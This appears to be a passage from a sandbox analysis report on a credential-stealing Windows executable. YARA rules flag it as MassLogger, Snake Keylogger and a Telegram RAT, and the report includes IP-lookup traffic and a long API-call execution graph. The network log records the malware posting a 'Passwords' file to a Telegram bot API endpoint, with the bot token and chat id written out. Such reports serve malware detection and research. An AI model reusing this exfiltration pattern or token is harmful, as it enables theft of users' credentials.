                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jan 10, 2025 15:35:04.181526899 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 14:35:04 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 3e327adc464191928d28805331cdf70d
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049708104.21.80.14437336C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 14:34:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2025-01-10 14:34:58 UTC865INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 14:34:58 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 362
                                                                              Connection: close
                                                                              Age: 1834487
                                                                              Cache-Control: max-age=31536000
                                                                              cf-cache-status: HIT
                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p7JC7xYjA4h%2B3iXQ0vGgb9%2BfwJRbIz9EICd63M%2F%2FytaWBrpVWM2mzxrGujoDXRa4N13bwcrZ9hBcGOx%2FMOEKT434K2PITC7p%2B%2F1LcKyFV2ZJUjkFeHChkxox68YXbciPybKZX%2FlH"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffd6413ef0943ee-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1687&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1700640&cwnd=228&unsent_bytes=0&cid=b7a601eb8be3838a&ts=297&x=0"
                                                                              2025-01-10 14:34:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049749149.154.167.2204437336C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 14:35:04 UTC294OUTPOST /bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendDocument?chat_id=6712961026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary================8dd315a0f8efc48
                                                                              Host: api.telegram.org
                                                                              Content-Length: 1090
                                                                              Connection: Keep-Alive
                                                                              2025-01-10 14:35:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 35 61 30 66 38 65 66 63 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: --===============8dd315a0f8efc48Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                              2025-01-10 14:35:05 UTC388INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Fri, 10 Jan 2025 14:35:05 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 533
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2025-01-10 14:35:05 UTC533INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 31 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 31 30 33 31 31 35 32 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 74 65 70 70 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 31 32 39 36 31 30 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 70 74 77 69 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 65 70 74 77 69 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 31 39 37 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73
                                                                              Data Ascii: {"ok":true,"result":{"message_id":6190,"from":{"id":7910311526,"is_bot":true,"first_name":"NOVA","username":"Steppnovabot"},"chat":{"id":6712961026,"first_name":"Septwin","username":"septwin","type":"private"},"date":1736519705,"document":{"file_name":"Us


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:1
                                                                              Start time:09:34:53
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\VIAmJUhQ54.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\VIAmJUhQ54.exe"
                                                                              Imagebase:0x720000
                                                                              File size:987'648 bytes
                                                                              MD5 hash:1110092C1603912D573AC4539EF601A2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:09:34:54
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\VIAmJUhQ54.exe"
                                                                              Imagebase:0x760000
                                                                              File size:45'984 bytes
                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:4.6%
                                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                                Signature Coverage:6.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:165
                                                                                execution_graph 86419 798eb8 86423 76a635 86419->86423 86421 798ec3 86422 76a635 85 API calls 86421->86422 86422->86421 86425 76a642 86423->86425 86430 76a66f 86423->86430 86424 76a671 86464 73ec4e 82 API calls 86424->86464 86425->86424 86427 76a676 86425->86427 86425->86430 86432 76a669 86425->86432 86434 72936c 86427->86434 86429 76a67d 86454 72510d 86429->86454 86430->86421 86463 734525 61 API calls _memcpy_s 86432->86463 86435 729384 86434->86435 86445 729380 86434->86445 86436 794cbd __i64tow 86435->86436 86437 794bbf 86435->86437 86438 729398 86435->86438 86447 7293b0 __itow Mailbox _wcscpy 86435->86447 86439 794bc8 86437->86439 86440 794ca5 86437->86440 86465 74172b 81 API calls 4 library calls 86438->86465 86446 794be7 86439->86446 86439->86447 86481 74172b 81 API calls 4 library calls 86440->86481 86444 7293ba 86444->86445 86475 72ce19 86444->86475 86445->86429 86449 73f4ea 48 API calls 86446->86449 86466 73f4ea 86447->86466 86450 794c04 86449->86450 86451 73f4ea 48 API calls 86450->86451 86452 794c2a 86451->86452 86452->86445 86453 72ce19 48 API calls 86452->86453 86453->86445 86455 72511f 86454->86455 86456 791be7 86454->86456 86515 72b384 86455->86515 86524 75a58f 48 API calls _memcpy_s 86456->86524 86459 72512b 86459->86430 86460 791bf1 86525 726eed 86460->86525 86462 791bf9 Mailbox 86463->86430 86464->86427 86465->86447 86468 73f4f2 __calloc_impl 86466->86468 86469 73f50c 86468->86469 86470 73f50e std::exception::exception 86468->86470 86482 74395c 86468->86482 86469->86444 86496 746805 RaiseException 86470->86496 86472 73f538 86497 74673b 47 API calls _free 86472->86497 86474 73f54a 86474->86444 86476 72ce28 __wsetenvp 86475->86476 86504 73ee75 86476->86504 86478 72ce50 _memcpy_s 86479 73f4ea 48 API calls 86478->86479 86480 72ce66 86479->86480 86480->86445 86481->86447 86483 7439d7 __calloc_impl 86482->86483 86488 743968 __calloc_impl 86482->86488 86503 747c0e 47 API calls __getptd_noexit 86483->86503 86486 74399b RtlAllocateHeap 86486->86488 86495 7439cf 86486->86495 86488->86486 86489 743973 86488->86489 86490 7439c3 86488->86490 86493 7439c1 86488->86493 86489->86488 86498 7481c2 47 API calls 2 library calls 86489->86498 86499 74821f 47 API calls 7 library calls 86489->86499 86500 741145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 86489->86500 86501 747c0e 47 API calls __getptd_noexit 86490->86501 86502 747c0e 47 API calls __getptd_noexit 86493->86502 86495->86468 86496->86472 86497->86474 86498->86489 86499->86489 86501->86493 86502->86495 86503->86495 86506 73f4ea __calloc_impl 86504->86506 86505 74395c __crtLCMapStringA_stat 47 API calls 86505->86506 86506->86505 86507 73f50c 86506->86507 86508 73f50e std::exception::exception 86506->86508 86507->86478 86513 746805 RaiseException 86508->86513 86510 73f538 86514 74673b 47 API calls _free 86510->86514 86512 73f54a 86512->86478 86513->86510 86514->86512 86516 72b392 86515->86516 86523 72b3c5 _memcpy_s 86515->86523 86517 72b3b8 86516->86517 86518 72b3fd 86516->86518 86516->86523 86529 72bb85 86517->86529 86520 73f4ea 48 API calls 86518->86520 86521 72b407 86520->86521 86522 73f4ea 48 API calls 86521->86522 86522->86523 86523->86459 86524->86460 86526 726f00 86525->86526 86527 726ef8 86525->86527 86526->86462 86534 72dd47 48 API calls _memcpy_s 86527->86534 86530 72bb9b 86529->86530 86533 72bb96 _memcpy_s 86529->86533 86531 73ee75 48 API calls 86530->86531 86532 791b77 86530->86532 86531->86533 86532->86532 86533->86523 86534->86526 86535 72f030 86538 733b70 86535->86538 86537 72f03c 86539 733bc8 86538->86539 86593 7342a5 86538->86593 86540 733bef 86539->86540 86542 796fd1 86539->86542 86544 796f7e 86539->86544 86551 796f9b 86539->86551 86541 73f4ea 48 API calls 86540->86541 86543 733c18 86541->86543 86631 77ceca 332 API calls Mailbox 86542->86631 86547 73f4ea 48 API calls 86543->86547 86544->86540 86548 796f87 86544->86548 86546 796fbe 86630 76cc5c 87 API calls 4 library calls 86546->86630 86599 733c2c _memcpy_s __wsetenvp 86547->86599 86628 77d552 332 API calls Mailbox 86548->86628 86551->86546 86629 77da0e 332 API calls 2 library calls 86551->86629 86552 7342f2 86661 76cc5c 87 API calls 4 library calls 86552->86661 86555 7973b0 86555->86537 86556 79737a 86660 76cc5c 87 API calls 4 library calls 86556->86660 86557 797297 86650 76cc5c 87 API calls 4 library calls 86557->86650 86561 73dce0 53 API calls 86561->86599 86562 79707e 86632 76cc5c 87 API calls 4 library calls 86562->86632 86564 7340df 86651 76cc5c 87 API calls 4 library calls 86564->86651 86569 73f4ea 48 API calls 86569->86599 86570 72d645 53 API calls 86570->86599 86573 7972d2 86652 76cc5c 87 API calls 4 library calls 86573->86652 86574 72fe30 332 API calls 86574->86599 86576 797350 86658 76cc5c 87 API calls 4 library calls 86576->86658 86578 797363 86659 76cc5c 87 API calls 4 library calls 86578->86659 86580 7972e9 86653 76cc5c 87 API calls 4 library calls 86580->86653 86585 79714c 86647 77ccdc 48 API calls 86585->86647 86588 79733f 86657 76cc5c 87 API calls 4 library calls 86588->86657 86589 733f2b 86589->86537 86590 726eed 48 API calls 86590->86599 86591 72d286 48 API calls 86591->86599 86654 76cc5c 87 API calls 4 library calls 86593->86654 86594 7971a1 86649 73c15c 48 API calls 86594->86649 86597 73ee75 48 API calls 86597->86599 86599->86552 86599->86556 86599->86557 86599->86561 86599->86562 86599->86564 86599->86569 86599->86570 86599->86573 86599->86574 86599->86576 86599->86578 86599->86580 86599->86585 86599->86588 86599->86589 86599->86590 86599->86591 86599->86593 86599->86597 86600 7971e1 86599->86600 86609 72d9a0 53 API calls __cinit 86599->86609 86610 72d83d 53 API calls 86599->86610 86611 72cdb9 48 API calls 86599->86611 86612 72d6e9 86599->86612 86616 73c15c 48 API calls 86599->86616 86617 73c050 86599->86617 86633 72dcae 50 API calls Mailbox 86599->86633 86634 77ccdc 48 API calls 86599->86634 86635 76a1eb 50 API calls 86599->86635 86636 726a63 86599->86636 86600->86589 86656 76cc5c 87 API calls 4 library calls 86600->86656 86602 79715f 86602->86594 86648 77ccdc 48 API calls 86602->86648 86603 7971ce 86604 73c050 48 API calls 86603->86604 86606 7971d6 86604->86606 86605 7971ab 86605->86593 86605->86603 86606->86600 86607 797313 86606->86607 86655 76cc5c 87 API calls 4 library calls 86607->86655 86609->86599 86610->86599 86611->86599 86614 72d6f4 86612->86614 86615 72d71b 86614->86615 86662 72d764 55 API calls 86614->86662 86615->86599 86616->86599 86618 73c064 86617->86618 86620 73c069 Mailbox 86617->86620 86663 73c1af 48 API calls 86618->86663 86623 73c077 86620->86623 86664 73c15c 48 API calls 86620->86664 86622 73f4ea 48 API calls 86624 73c108 86622->86624 86623->86622 86625 73c152 86623->86625 86626 73f4ea 48 API calls 86624->86626 86625->86599 86627 73c113 86626->86627 86627->86599 86628->86589 86629->86546 86630->86542 86631->86599 86632->86589 86633->86599 86634->86599 86635->86599 86637 726adf 86636->86637 86639 726a6f __wsetenvp 86636->86639 86669 72b18b 86637->86669 86640 726ad7 86639->86640 86641 726a8b 86639->86641 86668 72c369 48 API calls 86640->86668 86665 726b4a 86641->86665 86644 726ab6 _memcpy_s 86644->86599 86645 726a95 86646 73ee75 48 API calls 86645->86646 86646->86644 86647->86602 86648->86602 86649->86605 86650->86564 86651->86589 86652->86580 86653->86589 86654->86589 86655->86589 86656->86589 86657->86589 86658->86589 86659->86589 86660->86589 86661->86555 86662->86615 86663->86620 86664->86623 86666 73f4ea 48 API calls 86665->86666 86667 726b54 86666->86667 86667->86645 86668->86644 86670 72b199 86669->86670 86672 72b1a2 _memcpy_s 86669->86672 86670->86672 86673 72bdfa 86670->86673 86672->86644 86674 72be0d 86673->86674 86678 72be0a _memcpy_s 86673->86678 86675 73f4ea 48 API calls 86674->86675 86676 72be17 86675->86676 86677 73ee75 48 API calls 86676->86677 86677->86678 86678->86672 86679 79197b 86684 73dd94 86679->86684 86683 79198a 86685 73f4ea 48 API calls 86684->86685 86686 73dd9c 86685->86686 86687 73ddb0 86686->86687 86692 73df3d 86686->86692 86691 740f0a 52 API calls __cinit 86687->86691 86691->86683 86693 73df46 86692->86693 86694 73dda8 86692->86694 86724 740f0a 52 API calls __cinit 86693->86724 86696 73ddc0 86694->86696 86725 72d7f7 86696->86725 86699 726a63 48 API calls 86700 73de1a 86699->86700 86730 73dfb4 86700->86730 86705 7924c8 86707 73dea4 GetCurrentProcess 86747 73df5f LoadLibraryA GetProcAddress 86707->86747 86709 73dee3 86741 73e00c 86709->86741 86710 73df31 GetSystemInfo 86712 73df0e 86710->86712 86714 73df21 86712->86714 86715 73df1c FreeLibrary 86712->86715 86714->86687 86715->86714 86717 73debb 86717->86709 86717->86710 86718 73df29 GetSystemInfo 86720 73df03 86718->86720 86719 73def9 86744 73dff4 86719->86744 86720->86712 86723 73df09 FreeLibrary 86720->86723 86723->86712 86724->86694 86726 73f4ea 48 API calls 86725->86726 86727 72d818 86726->86727 86728 73f4ea 48 API calls 86727->86728 86729 72d826 GetVersionExW 86728->86729 86729->86699 86731 73dfbd 86730->86731 86732 72b18b 48 API calls 86731->86732 86733 73de22 86732->86733 86734 726571 86733->86734 86735 72657f 86734->86735 86736 72b18b 48 API calls 86735->86736 86737 72658f 86736->86737 86737->86705 86738 73df77 86737->86738 86748 73df89 86738->86748 86752 73e01e 86741->86752 86745 73e00c 2 API calls 86744->86745 86746 73df01 GetNativeSystemInfo 86745->86746 86746->86720 86747->86717 86749 73dea0 86748->86749 86750 73df92 LoadLibraryA 86748->86750 86749->86707 86749->86717 86750->86749 86751 73dfa3 GetProcAddress 86750->86751 86751->86749 86753 73def1 86752->86753 86754 73e027 LoadLibraryA 86752->86754 86753->86718 86753->86719 86754->86753 86755 73e038 GetProcAddress 86754->86755 86755->86753 86756 7919ba 86761 73c75a 86756->86761 86760 7919c9 86762 72d7f7 48 API calls 86761->86762 86763 73c7c8 86762->86763 86769 73d26c 86763->86769 86766 73c865 86767 73c881 86766->86767 86772 73d1fa 48 API calls _memcpy_s 86766->86772 86768 740f0a 52 API calls __cinit 86767->86768 86768->86760 86773 73d298 86769->86773 86772->86766 86774 73d2a5 86773->86774 86775 73d28b 86773->86775 86774->86775 86776 73d2ac RegOpenKeyExW 86774->86776 86775->86766 86776->86775 86777 73d2c6 RegQueryValueExW 86776->86777 86778 73d2e7 86777->86778 86779 73d2fc RegCloseKey 86777->86779 86778->86779 86779->86775 86780 7919dd 86785 724a30 86780->86785 86782 7919f1 86805 740f0a 52 API calls __cinit 86782->86805 86784 7919fb 86786 724a40 __ftell_nolock 86785->86786 86787 72d7f7 48 API calls 86786->86787 86788 724af6 86787->86788 86806 725374 86788->86806 86790 724aff 86813 72363c 86790->86813 86797 72d7f7 48 API calls 86798 724b32 86797->86798 86835 7249fb 86798->86835 86800 7261a6 48 API calls 86802 724b3d _wcscat Mailbox __wsetenvp 86800->86802 86801 724b43 Mailbox 86801->86782 86802->86800 86802->86801 86803 72ce19 48 API calls 86802->86803 86804 7264cf 48 API calls 86802->86804 86803->86802 86804->86802 86805->86784 86849 74f8a0 86806->86849 86809 72ce19 48 API calls 86810 7253a7 86809->86810 86851 72660f 86810->86851 86812 7253b1 Mailbox 86812->86790 86814 723649 __ftell_nolock 86813->86814 86858 72366c GetFullPathNameW 86814->86858 86816 72365a 86817 726a63 48 API calls 86816->86817 86818 723669 86817->86818 86819 72518c 86818->86819 86820 725197 86819->86820 86821 791ace 86820->86821 86822 72519f 86820->86822 86824 726b4a 48 API calls 86821->86824 86860 725130 86822->86860 86826 791adb __wsetenvp 86824->86826 86825 724b18 86829 7264cf 86825->86829 86827 73ee75 48 API calls 86826->86827 86828 791b07 _memcpy_s 86827->86828 86831 72651b 86829->86831 86834 7264dd _memcpy_s 86829->86834 86830 73f4ea 48 API calls 86832 724b29 86830->86832 86833 73f4ea 48 API calls 86831->86833 86832->86797 86833->86834 86834->86830 86870 72bcce 86835->86870 86838 7941cc RegQueryValueExW 86840 7941e5 86838->86840 86841 794246 RegCloseKey 86838->86841 86839 724a2b 86839->86802 86842 73f4ea 48 API calls 86840->86842 86843 7941fe 86842->86843 86876 7247b7 86843->86876 86846 79423b 86846->86841 86847 794224 86848 726a63 48 API calls 86847->86848 86848->86846 86850 725381 GetModuleFileNameW 86849->86850 86850->86809 86852 74f8a0 __ftell_nolock 86851->86852 86853 72661c GetFullPathNameW 86852->86853 86854 726a63 48 API calls 86853->86854 86855 726643 86854->86855 86856 726571 48 API calls 86855->86856 86857 72664f 86856->86857 86857->86812 86859 72368a 86858->86859 86859->86816 86861 72513f __wsetenvp 86860->86861 86862 725151 86861->86862 86863 791b27 86861->86863 86865 72bb85 48 API calls 86862->86865 86864 726b4a 48 API calls 86863->86864 86866 791b34 86864->86866 86867 72515e _memcpy_s 86865->86867 86868 73ee75 48 API calls 86866->86868 86867->86825 86869 791b57 _memcpy_s 86868->86869 86871 724a0a RegOpenKeyExW 86870->86871 86872 72bce8 86870->86872 86871->86838 86871->86839 86873 73f4ea 48 API calls 86872->86873 86874 72bcf2 86873->86874 86875 73ee75 48 API calls 86874->86875 86875->86871 86877 73f4ea 48 API calls 86876->86877 86878 7247c9 RegQueryValueExW 86877->86878 86878->86846 86878->86847 86879 f060f8 86893 f03d48 86879->86893 86881 f061dd 86896 f05fe8 86881->86896 86899 f07208 GetPEB 86893->86899 86895 f043d3 86895->86881 86897 f05ff1 Sleep 86896->86897 86898 f05fff 86897->86898 86900 f07232 86899->86900 86900->86895 86901 73221a 86902 73271e 86901->86902 86903 732223 86901->86903 86911 731eba Mailbox 86902->86911 86912 75a58f 48 API calls _memcpy_s 86902->86912 86903->86902 86904 72936c 82 API calls 86903->86904 86905 73224e 86904->86905 86905->86902 86906 73225e 86905->86906 86908 72b384 48 API calls 86906->86908 86908->86911 86909 79be8a 86910 726eed 48 API calls 86909->86910 86910->86911 86912->86909 86913 745dfd 86914 745e09 __getstream 86913->86914 86950 747eeb GetStartupInfoW 86914->86950 86916 745e0e 86952 749ca7 GetProcessHeap 86916->86952 86918 745e66 86921 745e71 86918->86921 87037 745f4d 47 API calls 3 library calls 86918->87037 86953 747b47 86921->86953 86922 745e77 86923 745e82 __RTC_Initialize 86922->86923 87038 745f4d 47 API calls 3 library calls 86922->87038 86974 74acb3 86923->86974 86926 745e91 86927 745e9d GetCommandLineW 86926->86927 87039 745f4d 47 API calls 3 library calls 86926->87039 86993 752e7d GetEnvironmentStringsW 86927->86993 86930 745e9c 86930->86927 86934 745ec2 87006 752cb4 86934->87006 86937 745ec8 86938 745ed3 86937->86938 87041 74115b 47 API calls 3 library calls 86937->87041 87020 741195 86938->87020 86941 745edb 86942 745ee6 __wwincmdln 86941->86942 87042 74115b 47 API calls 3 library calls 86941->87042 87024 723a0f 86942->87024 86945 745efa 86946 745f09 86945->86946 87043 7413f1 47 API calls _doexit 86945->87043 87044 741186 47 API calls _doexit 86946->87044 86949 745f0e __getstream 86951 747f01 86950->86951 86951->86916 86952->86918 87045 74123a 30 API calls 2 library calls 86953->87045 86955 747b4c 87046 747e23 InitializeCriticalSectionAndSpinCount 86955->87046 86957 747b51 86958 747b55 86957->86958 87048 747e6d TlsAlloc 86957->87048 87047 747bbd 50 API calls 2 library calls 86958->87047 86961 747b5a 86961->86922 86962 747b67 86962->86958 86963 747b72 86962->86963 87049 746986 86963->87049 86966 747bb4 87057 747bbd 50 API calls 2 library calls 86966->87057 86969 747bb9 86969->86922 86970 747b93 86970->86966 86971 747b99 86970->86971 87056 747a94 47 API calls 4 library calls 86971->87056 86973 747ba1 GetCurrentThreadId 86973->86922 86975 74acbf __getstream 86974->86975 87066 747cf4 86975->87066 86977 74acc6 86978 746986 __calloc_crt 47 API calls 86977->86978 86979 74acd7 86978->86979 86980 74ad42 GetStartupInfoW 86979->86980 86981 74ace2 @_EH4_CallFilterFunc@8 __getstream 86979->86981 86987 74ae80 86980->86987 86990 74ad57 86980->86990 86981->86926 86982 74af44 87073 74af58 LeaveCriticalSection _doexit 86982->87073 86984 74aec9 GetStdHandle 86984->86987 86985 746986 __calloc_crt 47 API calls 86985->86990 86986 74aedb GetFileType 86986->86987 86987->86982 86987->86984 86987->86986 86989 74af08 InitializeCriticalSectionAndSpinCount 86987->86989 86988 74ada5 86988->86987 86991 74ade5 InitializeCriticalSectionAndSpinCount 86988->86991 86992 74add7 GetFileType 86988->86992 86989->86987 86990->86985 86990->86987 86990->86988 86991->86988 86992->86988 86992->86991 86994 745ead 86993->86994 86996 752e8e 86993->86996 87000 752a7b GetModuleFileNameW 86994->87000 86995 752ea9 87112 7469d0 47 API calls __crtLCMapStringA_stat 86995->87112 86996->86995 86996->86996 86998 752eb4 _memcpy_s 86999 752eca FreeEnvironmentStringsW 86998->86999 86999->86994 87001 752aaf _wparse_cmdline 87000->87001 87002 745eb7 87001->87002 87003 752ae9 87001->87003 87002->86934 87040 74115b 47 API calls 3 library calls 87002->87040 87113 7469d0 47 API calls __crtLCMapStringA_stat 87003->87113 87005 752aef _wparse_cmdline 87005->87002 87007 752ccd __wsetenvp 87006->87007 87011 752cc5 87006->87011 87008 746986 __calloc_crt 47 API calls 87007->87008 87016 752cf6 __wsetenvp 87008->87016 87009 752d4d 87010 741c9d _free 47 API calls 87009->87010 87010->87011 87011->86937 87012 746986 __calloc_crt 47 API calls 87012->87016 87013 752d72 87015 741c9d _free 47 API calls 87013->87015 87015->87011 87016->87009 87016->87011 87016->87012 